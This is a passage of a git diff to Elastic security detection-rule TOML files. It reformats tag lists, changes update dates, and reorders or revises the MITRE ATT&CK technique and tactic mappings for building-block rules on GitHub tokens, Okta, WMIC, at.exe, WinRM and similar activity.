+name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/execution_mcp_server_child_process.toml b/rules_building_block/execution_mcp_server_child_process.toml index c29262c19e5..12629a21bf0 100644 --- a/rules_building_block/execution_mcp_server_child_process.toml +++ b/rules_building_block/execution_mcp_server_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -121,26 +121,14 @@ process where event.type == "start" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0053" -name = "AI Agent Tool Invocation" -reference = "https://atlas.mitre.org/techniques/AML.T0053/" - -[rule.threat.tactic] -id = "AML.TA0005" -name = "Execution" -reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml index 5ca6627651a..1c014464624 100644 --- a/rules_building_block/execution_settingcontent_ms_file_creation.toml +++ b/rules_building_block/execution_settingcontent_ms_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -21,7 +21,16 @@ references = ["https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f risk_score = 21 rule_id = "1e6363a6-3af5-41d4-b7ea-d475389c0ceb" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "eql" @@ -37,31 +46,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/execution_unsigned_service_executable.toml b/rules_building_block/execution_unsigned_service_executable.toml index ffcabcb5d95..3a861c4ab50 100644 --- a/rules_building_block/execution_unsigned_service_executable.toml +++ b/rules_building_block/execution_unsigned_service_executable.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Execution of an Unsigned Service" risk_score = 21 rule_id = "56fdfcf1-ca7c-4fd9-951d-e215ee26e404" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "new_terms" @@ -34,21 +42,39 @@ not process.code_signature.status : (errorCode_endpoint* or "errorChaining") [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" - [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "user.id"] diff --git a/rules_building_block/impact_github_pat_access_revoked.toml b/rules_building_block/impact_github_pat_access_revoked.toml index 3d5e9ef049b..f94c6f93197 100644 --- a/rules_building_block/impact_github_pat_access_revoked.toml +++ b/rules_building_block/impact_github_pat_access_revoked.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -33,3 +33,16 @@ configuration where event.dataset == "github.audit" and event.action == "persona ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml index f73cc4350e5..2e625988a7e 100644 --- a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml +++ b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] @@ -87,31 +87,31 @@ network where http.request.method == "POST" and http.response.status_code != 200 [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml index 51618b8cec8..b441c6147ea 100644 --- a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml +++ b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of IP Address For GitHub Personal Access Token (PAT)" risk_score = 21 rule_id = "fc909baa-fb34-4c46-9691-be276ef4234c" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Initial Access", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,39 +37,22 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.actor_ip"] diff --git a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml index 1479b9622dc..8f55ee6ca9d 100644 --- a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml +++ b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -51,3 +51,27 @@ event.dataset:o365.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml index e0e39924ce2..168d55055ce 100644 --- a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -57,3 +57,24 @@ event.dataset:o365.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml index 25dca76688d..fc9e62e6053 100644 --- a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/08/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -73,7 +73,20 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Defender", "Data Source: Microsoft Defender for Office 365", "Data Source: Microsoft Threat Intelligence", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Defender", + "Data Source: Microsoft Defender for Office 365", + "Data Source: Microsoft Threat Intelligence", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -85,13 +98,26 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml index ab6d84d3a15..6126e019db1 100644 --- a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml +++ b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/04" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -55,3 +55,39 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules_building_block/initial_access_new_okta_authentication_behavior.toml b/rules_building_block/initial_access_new_okta_authentication_behavior.toml index c5fc2bc4b00..3333bc42b4d 100644 --- a/rules_building_block/initial_access_new_okta_authentication_behavior.toml +++ b/rules_building_block/initial_access_new_okta_authentication_behavior.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/08" [rule] author = ["Elastic"] @@ -76,17 +76,8 @@ event.dataset:okta.system and okta.debug_context.debug_data.risk_behaviors:* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml index cc03ed2a61a..38c577a2179 100644 --- a/rules_building_block/initial_access_okta_admin_console_login_failure.toml +++ b/rules_building_block/initial_access_okta_admin_console_login_failure.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/03" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -58,7 +58,16 @@ references = [ risk_score = 21 rule_id = "f960e8a4-31c1-4a6e-b172-8f5c8e5c8c2a" severity = "low" -tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide", "Rule Type: BBR"] +tags = [ + "Domain: Identity", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Data Source: Okta System Logs", + "Tactic: Initial Access", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -72,13 +81,26 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules_building_block/lateral_movement_at.toml b/rules_building_block/lateral_movement_at.toml index 463fc4d11a7..ddedfe457c3 100644 --- a/rules_building_block/lateral_movement_at.toml +++ b/rules_building_block/lateral_movement_at.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,16 @@ name = "At.exe Command Lateral Movement" risk_score = 21 rule_id = "b483365c-98a8-40c0-92d8-0458ca25058a" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -37,31 +46,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml index aca164ce61f..444d49ece7f 100644 --- a/rules_building_block/lateral_movement_posh_winrm_activity.toml +++ b/rules_building_block/lateral_movement_posh_winrm_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -83,36 +83,36 @@ case_insensitive = true value = "?:\\\\ExchangeServer\\\\bin*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.006" +name = "Windows Remote Management" +reference = "https://attack.mitre.org/techniques/T1021/006/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.006" -name = "Windows Remote Management" -reference = "https://attack.mitre.org/techniques/T1021/006/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml index 79380de7439..dbc9fce692a 100644 --- a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml +++ b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -24,7 +24,15 @@ references = [ risk_score = 21 rule_id = "e74d645b-fec6-431e-bf93-ca64a538e0de" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -70,31 +78,31 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" - [[rule.threat.technique.subtechnique]] id = "T1505.001" name = "SQL Stored Procedures" reference = "https://attack.mitre.org/techniques/T1505/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml index 79969f690ec..75ac81fc7f1 100644 --- a/rules_building_block/lateral_movement_wmic_remote.toml +++ b/rules_building_block/lateral_movement_wmic_remote.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,17 @@ name = "WMIC Remote Command" risk_score = 21 rule_id = "f59668de-caa0-4b84-94c1-3a1549e1e798" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -41,31 +51,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.006" +name = "Windows Remote Management" +reference = "https://attack.mitre.org/techniques/T1021/006/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml index eed1c2780d2..f4aaaef461d 100644 --- a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml +++ b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -43,18 +43,29 @@ event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml index 74a5af6d46e..a65b0128137 100644 --- a/rules_building_block/persistence_github_new_pat_for_user.toml +++ b/rules_building_block/persistence_github_new_pat_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of Personal Access Token (PAT) Use For a GitHub User" risk_score = 21 rule_id = "f94e898e-94f1-4545-8923-03e4b2866211" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,22 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" 